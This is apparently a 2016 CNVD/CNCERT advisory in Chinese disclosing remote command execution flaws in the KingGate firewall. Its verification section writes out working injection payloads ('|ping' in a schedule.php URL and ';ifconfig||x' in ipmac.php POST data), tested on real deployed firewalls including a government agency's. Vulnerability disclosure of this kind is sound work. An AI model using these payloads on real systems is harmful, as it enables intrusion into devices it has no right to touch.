关于深圳金山信息安全技术有限公司KingGate防火墙存在远程命令执行.doc

国家信息安全漏洞共享平台(CNVD)漏洞通报 关于深圳金山信息安全技术有限公司KingGate防火墙存在多处远程命令执行漏洞的情况通报 国家互联网应急中心（CNCERT） 2016年3月3日 漏洞描述 漏洞事件： 深圳金山信息安全技术有限公司KingGate防火墙存在多处远程命令执行漏洞 通报时间： 2016年3月3日 漏洞引发的威胁： 远程执行系统命令。 评分评级：(AV:R/AC:L/Au:NR/C:C/A:C/I:C/B:N) score:10.00（最高10分，高危），即：远程攻击、攻击难度低、不需要用户认证，对机密性、完整性、可用性构成完全影响。 影响产品： 深圳金山信息安全技术有限公司KingGate防火墙 （） 信息来源： CNVD、漏洞报送者 漏洞描述： 根据漏洞报送者描述，深圳金山信息安全技术有限公司KingGate防火墙存在多处远程命令执行漏洞。综合利用漏洞，允许攻击者远程执行命令，构成信息泄露和运行安全风险。 影响范围： 深圳金山信息安全技术有限公司KingGate防火墙 验证情况 2.1 根据漏洞报送者描述，深圳金山信息安全技术有限公司KingGate防火墙存在多处远程命令执行漏洞： 第一处 以04为例，构造URL为： 04/src/application/firewall/schedule.php?IG_pagenum=5IG_dir=a|ping IG_operation=IG_deleteIG_checkbox=1 图 通过相关公网服务器可收到ping命令回显结果： 图 接收回显结果 第二处 以/为例，访问URL：/src/system/ipmac.php，提交POST数据为：IG_operation=IG_deleteIG_checkbox8=11;ifconfig||x，可执行ifconfig命令： 图 ifconfig命令 以襄阳市安全生产监督管理局防火墙系统为例，访问URL：:8443/src/system/ipmac.php，提交POST数据为：IG_operation=IG_deleteIG_checkbox8=11;ifconfig||x，可执行ifconfig命令： 图 ifconfig命令 以95为例，访问URL：95/src/system/ipmac.php，提交POST数据为：IG_operation=IG_deleteIG_checkbox8=11;ifconfig||x，可执行ifconfig命令： 图 ifconfig命令 3.处置措施 3.1 针对远程命令执行漏洞，建议修改源代码，并在服务端对用户提交的字符进行过滤。 关于CNVD 国家信息安全漏洞共享平台（China National Vulnerability Database，简称CNVD）是CNCERT联合国内重要信息系统单位、基础电信运营商、网络安全厂商、软件厂商和互联网企业建立的信息安全漏洞信息共享知识库，致力于建立国家统一的信息安全漏洞收集、发布、验证、分析等应急处理体系。 关于CNCERT 国家计算机网络应急技术处理协调中心（简称“国家互联网应急中心”，英文简称是CNCERT或CNCERT/CC），成立于2002年9月，为非政府非盈利的网络安全技术中心，是我国网络安全应急体系的核心协调机构。 作为国家级应急中心，CNCERT的主要职责是：按照“积极预防、及时发现、快速响应、力保恢复”的方针，开展互联网网络安全事件的预防、发现、预警和协调处置等工作，维护国家公共互联网安全，保障基础信息网络和重要信息系统的安全运行。 网址： 邮箱：vreport@ 电话：010